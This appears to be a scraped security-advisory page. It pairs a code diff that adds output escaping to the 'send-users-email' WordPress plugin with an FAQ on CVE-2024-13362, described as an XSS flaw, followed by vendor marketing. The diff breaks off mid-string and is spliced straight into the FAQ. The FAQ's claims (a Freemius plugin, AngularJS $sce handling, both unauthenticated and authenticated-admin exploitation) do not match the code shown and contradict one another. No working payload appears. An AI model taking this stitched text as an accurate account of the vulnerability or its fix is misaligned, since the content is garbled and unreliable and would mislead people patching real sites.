style="display:inline-block;border-width:0;max-width: 35px;">
</a>
--- a/send-users-email/admin/partials/email_and_error_log.php
+++ b/send-users-email/admin/partials/email_and_error_log.php
@@ -14,12 +14,12 @@
<?php if ( empty( $emailLogFiles ) && empty( $errorLog ) ): ?>
<div class="card shadow">
<div class="card-body">
- <h5 class="card-title text-uppercase mb-4 text-primary text-center"><?php echo __( 'Logs',
+ <h5 class="card-title text-uppercase mb-4 text-primary text-center"><?php esc_attr_e( 'Logs',
'send-users-email' ); ?></h5>
<div class="alert alert-info" role="alert">
- <p class="text-center"><?php echo __( 'There are no logs to display right now.',
+ <p class="text-center"><?php esc_attr_e( 'There are no logs to display right now.',
'send-users-email' ); ?></p>
- <p class="text-center"><?php echo __( 'You will find error log and email log here once available.',
+ <p class="text-center"><?php esc_attr_e( 'You will find error log and email log here once available.',
'send-users-email' ); ?></p>
</div>
@@ -30,25 +30,25 @@
<?php if ( ! empty( $emailLogFiles ) ): ?>
<div class="card shadow">
<div class="card-body">
- <h5 class="card-title text-uppercase mb-4 text-primary"><?php echo __( 'Email Log',
+ <h5 class="card-title text-uppercase mb-4 text-primary"><?php esc_attr_e( 'Email Log',
'send-users-email' ); ?></h5>
<form class="row row-cols-lg-auto g-3 align-items-center" action="javascript:void(0)"
method="post" id="sue-view-email-log">
<input type="hidden" id="_wpnonce" name="_wpnonce"
- value="<?php echo wp_create_nonce( 'sue-email-log-view' ); ?>"/>
+ value="<?php echo esc_attr( wp_create_nonce( 'sue-email-log-view' ) ); ?>"/>
<div class="form-group">
<select class="form-select" aria-label="Select date to view email log"
name="sue_view_email_log_file" id="sue_view_email_log_file">
<option value="0" selected>Select date to view sent email logs</option>
<?php foreach ( $emailLogFiles as $file ): ?>
<?php $displayName = ucwords( str_replace( [ '-', '.log' ], ' ', $file ) ); ?>
- <option value="<?php echo $file; ?>"><?php echo $displayName; ?></option>
+ <option value="<?php echo esc_attr($file); ?>"><?php echo esc_attr($displayName); ?></option>
<?php endforeach; ?>
</select>
</div>
<button id="sue-view-log-btn" class="btn btn-primary btn-sm text-uppercase mx-3"
type="submit" disabled>
- <?php esc_attr_e( 'View Log' ); ?>
+ <?php esc_attr_e( 'View Log', 'send-users-email' ); ?>
</button>
</form>
<div class="form-group mt-4" id="emailLogTextAreaContainer" style="display: none;">
@@ -65,16 +65,16 @@
<div class="row">
<div class="col-md-9">
- <h5 class="card-title text-uppercase mb-4 text-danger"><?php echo __( 'Error Log',
+ <h5 class="card-title text-uppercase mb-4 text-danger"><?php esc_attr_e( 'Error Log',
'send-users-email' ); ?></h5>
</div>
<div class="col-md-3">
<form action="" method="post" style="float: right;"
onsubmit="return confirm('Are you sure?')">
<input type="hidden" id="_wpnonce" name="_wpnonce"
- value="<?php echo wp_create_nonce( 'sue-delete-error-log' ); ?>"/>
+ value="<?php echo esc_attr( wp_create_nonce( 'sue-delete-error-log' ) ); ?>"/>
<button class="btn btn-danger btn-sm text-uppercase" type="submit"
- name="sue_delete_error_log"><?php esc_attr_e( 'Delete Error Logs' ); ?></button>
+ name="sue_delete_error_log"><?php esc_attr_e( 'Delete Error Logs', 'send-users-email' ); ?></button>
</form>
</div>
</div>
@@ -83,11 +83,11 @@
<textarea class="form-control" id="error_log" rows="8"
readonly><?php echo esc_textarea( $errorLog ); ?></textarea>
<div class="form-text">
- <?php echo __( 'Please note that the error logged here is only when wp_mail function fails.',
+ <?php esc_attr_e( 'Please note that the error logged here is only when wp_mail function fails.',
'send-users-email' ) ?>
- <?php echo __( 'It is possible that wp_mail is able to send email successfully but your email service provider dropped sent email at their end.',
+ <?php esc_attr_e( 'It is possible that wp_mail is able to send email successfully but your email service provider dropped sent email at their end.',
'send-users-email' ) ?>
- <?php echo __( 'In this case there is nothing this plugin can do and you need to contact your email service provider for more details on why your emails are not being sent.',
+ <?php esc_attr_e( 'In this case there is nothing this plugin can do and you need to contact your email service provider for more details on why your emails are not being sent.',
'send-users-email' ) ?>
</div>
</div>
@@ -111,11 +111,11 @@
<?php if ( $barPercent > 15 ): ?>
<div class="progress mt-3" role="progressbar" aria-label="Success example"
aria-valuenow="25" aria-valuemin="0" aria-valuemax="100">
- <div class="progress-bar bg-<?php echo $barColor; ?>"
- style="width: <?php echo $barPercent; ?>%">
- <?php echo __( 'Error log file size is ',
- 'send-users-email' ) ?> <?php echo $errorFileSizeMB; ?> MB.
- <?php echo $warningMessage; ?>
+ <div class="progress-bar bg-<?php echo esc_attr($barColor); ?>"
+ style="width: <?php echo esc_attr($barPercent); ?>%">
+ <?php esc_attr_e( 'Error log file size is ',
+ 'send-users-email' ) ?> <?php echo esc_attr($errorFileSizeMB); ?> MB.
+ <?php echo esc_attr($warningMessage); ?>
</div>
</div>
<?php endif; ?>
--- a/send-users-email/admin/partials/roles-email.php
+++ b/send-users-email/admin/partials/roles-email.php
@@ -5,7 +5,7 @@
<div class="card shadow">
<div class="card-body">
<h5 class="card-title mb-4 text-uppercase text-center"><?php
-echo __( 'Send email to selected roles', 'send-users-email' );
+esc_attr_e( 'Send email to selected roles', 'send-users-email' );
?></h5>
<?php
@@ -16,19 +16,55 @@
<div class="mb-4">
<label for="subject"
class="form-label"><?php
-echo __( 'Email Subject', 'send-users-email' );
+esc_attr_e( 'Email Subject', 'send-users-email' );
?></label>
<input type="text" class="form-control subject" id="subject" name="subject" maxlength="200"
placeholder="<?php
-echo __( 'Email subject here', 'send-users-email' );
+esc_attr_e( 'Email subject here', 'send-users-email' );
?> <?php
?>">
</div>
+ <?php
+if ( $allowed_title_tagline && sue_fs()->is__premium_only() && sue_fs()->can_use_premium_code() ) {
+ ?>
+
+ <div class="mb-4">
+ <label for="title"
+ class="form-label"><?php
+ esc_attr_e( 'Email Title', 'send-users-email' );
+ ?></label>
+ <input type="text" class="form-control title" id="title" name="title" maxlength="200" value="<?php
+ echo esc_attr( $title );
+ ?>"
+ placeholder="<?php
+ esc_attr_e( 'Email title here', 'send-users-email' );
+ ?> <?php
+ ?>">
+ </div>
+
+ <div class="mb-4">
+ <label for="tagline"
+ class="form-label"><?php
+ esc_attr_e( 'Email Tagline', 'send-users-email' );
+ ?></label>
+ <input type="text" class="form-control tagline" id="tagline" name="tagline" maxlength="200" value="<?php
+ echo esc_attr( $tagline );
+ ?>"
+ placeholder="<?php
+ esc_attr_e( 'Email tagline here', 'send-users-email' );
+ ?> <?php
+ ?>">
+ </div>
+
+ <?php
+}
+?>
+
<div class="mb-4">
<div class="sue-role-email-list">
<label class="form-label"><?php
-echo __( 'Select Role(s)', 'send-users-email' );
+esc_attr_e( 'Select Role(s)', 'send-users-email' );
?></label>
<div class="row">
<div class="col-md-6">
@@ -62,7 +98,7 @@
echo esc_attr( $slug );
?>">
<?php
- echo ucwords( str_replace( '_', ' ', esc_html( $slug ) ) );
+ echo esc_attr( ucwords( str_replace( '_', ' ', esc_html( $slug ) ) ) );
?>
</label>
</div>
@@ -116,7 +152,7 @@
echo esc_attr( $slug );
?>">
<?php
- echo ucwords( str_replace( '_', ' ', esc_html( $slug ) ) );
+ echo esc_attr( ucwords( str_replace( '_', ' ', esc_html( $slug ) ) ) );
?>
</label>
</div>
@@ -147,7 +183,7 @@
<div class="mb-4">
<label for="sue_user_email_message"
class="form-label"><?php
-echo __( 'Email Message', 'send-users-email' );
+esc_attr_e( 'Email Message', 'send-users-email' );
?></label>
<?php
@@ -161,18 +197,21 @@
<input type="hidden" id="_wpnonce" name="_wpnonce"
value="<?php
-echo wp_create_nonce( 'sue-email-user' );
+echo esc_attr( wp_create_nonce( 'sue-email-user' ) );
?>"/>
<?php
?>
+
+ <?php
+?>
<div class="row">
<div class="col-md-3">
<div class="d-grid gap-2">
<button type="submit" id="sue-roles-email-btn" class="btn btn-primary btn-block">
<span class="dashicons dashicons-email"></span> <?php
-echo __( 'Send Message', 'send-users-email' );
+esc_attr_e( 'Send Message', 'send-users-email' );
?>
</button>
</div>
@@ -180,7 +219,7 @@
<div class="col-md-2 mt-2">
<div class="spinner-border text-info sue-spinner" role="status">
<span class="visually-hidden"><?php
-echo __( 'Loading...', 'send-users-email' );
+esc_attr_e( 'Loading...', 'send-users-email' );
?></span>
</div>
</div>
@@ -214,10 +253,10 @@
<div class="card shadow">
<div class="card-body">
<h5 class="card-title text-uppercase"><?php
-echo __( 'Instruction', 'send-users-email' );
+esc_attr_e( 'Instruction', 'send-users-email' );
?></h5>
<p class="card-text"><?php
-echo __( 'Send email to all users belonging to selected roles.', 'send-users-email' );
+esc_attr_e( 'Send email to all users belonging to selected roles.', 'send-users-email' );
?></p>
</div>
</div>
--- a/send-users-email/admin/partials/settings.php
+++ b/send-users-email/admin/partials/settings.php
@@ -5,7 +5,7 @@
<div class="card shadow">
<div class="card-body">
<h5 class="card-title mb-5 text-uppercase"><?php
-echo __( 'Settings', 'send-users-email' );
+esc_attr_e( 'Settings', 'send-users-email' );
?></h5>
<div class="sue-messages"></div>
@@ -17,11 +17,11 @@
<tr>
<td style="width: 25%">
<label for="logo" class="form-label"><?php
-echo __( 'Logo URL', 'send-users-email' );
+esc_attr_e( 'Logo URL', 'send-users-email' );
?></label>
<div id="logoHelp"
class="form-text"><?php
-echo __( 'Add email header logo URL here. If left blank, logo will not be used.', 'send-users-email' );
+esc_attr_e( 'Add email header logo URL here. If left blank, logo will not be used.', 'send-users-email' );
?></div>
</td>
<td>
@@ -30,7 +30,7 @@
echo esc_url_raw( $logo );
?>"
placeholder="<?php
-echo __( 'Add your logo URL', 'send-users-email' );
+esc_attr_e( 'Add your logo URL', 'send-users-email' );
?>"
aria-describedby="logoHelp">
</td>
@@ -39,11 +39,11 @@
<tr>
<td>
<label for="title" class="form-label"><?php
-echo __( 'Email Title', 'send-users-email' );
+esc_attr_e( 'Email Title', 'send-users-email' );
?></label>
<div id="titleHelp"
class="form-text"><?php
-echo __( 'This value will be shown below logo image.', 'send-users-email' );
+esc_attr_e( 'This value will be shown below logo image.', 'send-users-email' );
?></div>
</td>
<td>
@@ -61,11 +61,11 @@
<tr>
<td>
<label for="tagline" class="form-label"><?php
-echo __( 'Email Tagline', 'send-users-email' );
+esc_attr_e( 'Email Tagline', 'send-users-email' );
?></label>
<div id="taglineHelp"
class="form-text"><?php
-echo __( 'This value will be shown below email title image.', 'send-users-email' );
+esc_attr_e( 'This value will be shown below email title image.', 'send-users-email' );
?></div>
</td>
<td>
@@ -83,11 +83,11 @@
<tr>
<td>
<label for="footer" class="form-label"><?php
-echo __( 'Email Footer', 'send-users-email' );
+esc_attr_e( 'Email Footer', 'send-users-email' );
?></label>
<div id="footerHelp"
class="form-text"><?php
-echo __( 'Email footer content will be added to all emails at footer of email (supports HTML). Please use full https links for maximum compatibility among email clients.', 'send-users-email' );
+esc_attr_e( 'Email footer content will be added to all emails at footer of email (supports HTML). Please use full https links for maximum compatibility among email clients.', 'send-users-email' );
?></div>
</td>
<td>
@@ -96,7 +96,7 @@
echo esc_attr( $footer );
?>"
placeholder="<?php
-echo __( 'Email footer content', 'send-users-email' );
+esc_attr_e( 'Email footer content', 'send-users-email' );
?>"
aria-describedby="footerHelp">
</td>
@@ -106,11 +106,11 @@
<td>
<label for="email_from_name"
class="form-label"><?php
-echo __( 'Email From/Reply-To Name', 'send-users-email' );
+esc_attr_e( 'Email From/Reply-To Name', 'send-users-email' );
?></label>
<div id="emailFromNameHelp"
class="form-text"><?php
-echo __( 'Email from/reply-to name to use in send emails.', 'send-users-email' );
+esc_attr_e( 'Email from/reply-to name to use in send emails.', 'send-users-email' );
?></div>
</td>
<td>
@@ -120,7 +120,7 @@
echo esc_attr( $email_from_name );
?>"
placeholder="<?php
-echo __( 'Email from Name', 'send-users-email' );
+esc_attr_e( 'Email from Name', 'send-users-email' );
?>"
aria-describedby="emailFromNameHelp">
</td>
@@ -130,11 +130,11 @@
<td>
<label for="email_from_address"
class="form-label"><?php
-echo __( 'Email From Address', 'send-users-email' );
+esc_attr_e( 'Email From Address', 'send-users-email' );
?></label>
<div id="emailFromAddressHelp"
class="form-text"><?php
-echo __( 'Email from address to use in send emails.', 'send-users-email' );
+esc_attr_e( 'Email from address to use in send emails.', 'send-users-email' );
?></div>
</td>
<td>
@@ -152,11 +152,11 @@
<td>
<label for="reply_to_address"
class="form-label"><?php
-echo __( 'Reply To Address', 'send-users-email' );
+esc_attr_e( 'Reply To Address', 'send-users-email' );
?></label>
<div id="replyToAddressHelp"
class="form-text"><?php
-echo __( 'Reply To address to use.', 'send-users-email' );
+esc_attr_e( 'Reply To address to use.', 'send-users-email' );
?></div>
</td>
<td>
@@ -174,11 +174,11 @@
<td>
<label for="email_template_style"
class="form-label"><?php
-echo __( 'Email Template Style', 'send-users-email' );
+esc_attr_e( 'Email Template Style', 'send-users-email' );
?></label>
<div id="emailTemplateStyleHelp"
class="form-text"><?php
-echo __( 'Add your custom CSS style to email template. These style will be applied on top of default style.', 'send-users-email' );
+esc_attr_e( 'Add your custom CSS style to email template. These style will be applied on top of default style.', 'send-users-email' );
?></div>
</td>
<td>
@@ -197,14 +197,14 @@
<td>
<label for="email_send_roles"
class="form-label"><?php
-echo __( 'Roles', 'send-users-email' );
+esc_attr_e( 'Roles', 'send-users-email' );
?></label>
<div id="emailSendRolesHelp"
class="form-text"><?php
-echo __( 'Select role(s) that has access to send emails. Administrators by default has this access.', 'send-users-email' );
+esc_attr_e( 'Select role(s) that has access to send emails. Administrators by default has this access.', 'send-users-email' );
?><br>
<span class="text-danger"><strong><?php
-echo __( 'BFrequently Asked Questions
What is CVE-2024-13362?
Overview of the vulnerabilityCVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability found in the Freemius plugin for WordPress. It allows unauthenticated attackers to inject arbitrary web scripts via a specially crafted URL parameter, which can execute if a user clicks on the link.
Who is affected by this vulnerability?
Identifying vulnerable usersWordPress sites using the Freemius plugin version 1.5.10 or earlier are affected by this vulnerability. Administrators should check their plugin version and update if necessary to ensure their site is secure.
How can I check if my site is vulnerable?
Steps to verify vulnerabilityTo check if your site is vulnerable, verify the version of the Freemius plugin installed on your WordPress site. If it is version 1.5.10 or earlier, your site is at risk and should be updated immediately.
How can I fix CVE-2024-13362?
Mitigation stepsThe vulnerability can be fixed by updating the Freemius plugin to version 1.6.2 or later, where the vulnerability has been patched. Regularly updating all plugins and themes is a best practice to maintain security.
What does a CVSS score of 6.1 indicate?
Understanding severity levelsA CVSS score of 6.1 indicates a medium severity level for this vulnerability. It suggests that while exploitation requires user interaction, the potential impact on the site could lead to significant issues such as session hijacking or credential theft.
What is reflected DOM-based XSS?
Explaining the attack vectorReflected DOM-based XSS occurs when an attacker injects malicious scripts into a web page, which are then executed in the context of the user’s browser. This type of attack typically relies on tricking users into clicking on a crafted link.
What is the proof of concept for this vulnerability?
Demonstrating the exploitThe proof of concept for CVE-2024-13362 involves crafting a URL that includes a malicious AngularJS expression in the url parameter. When an authenticated administrator visits this URL, the plugin evaluates the expression, potentially executing arbitrary JavaScript.
What are the practical risks of this vulnerability?
Potential consequences of exploitationIf exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in an authenticated administrator’s browser session. This can lead to unauthorized actions on the WordPress site, such as changing settings or stealing sensitive information.
How does the patch address the vulnerability?
Details of the security updateThe patch for CVE-2024-13362 modifies the AngularJS $sce configuration to enforce stricter URL patterns, preventing the injection of unsafe expressions. It also includes additional sanitization checks to ensure that only safe URLs are processed.
What should I do if I cannot update the plugin immediately?
Interim measuresIf you cannot update the plugin immediately, consider disabling the plugin until an update can be applied. Additionally, educate users about the risks of clicking on unknown links to reduce the likelihood of exploitation.
Are there any additional security measures I should take?
Best practices for WordPress securityIn addition to updating plugins, ensure that your WordPress installation is up to date, use strong passwords, implement two-factor authentication, and regularly back up your site. Consider using a web application firewall (WAF) for added protection.
Where can I find more information about CVE-2024-13362?
Resources for further readingMore information about CVE-2024-13362 can be found on the official CVE database, security advisories from the plugin developers, and security-focused websites that track vulnerabilities.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
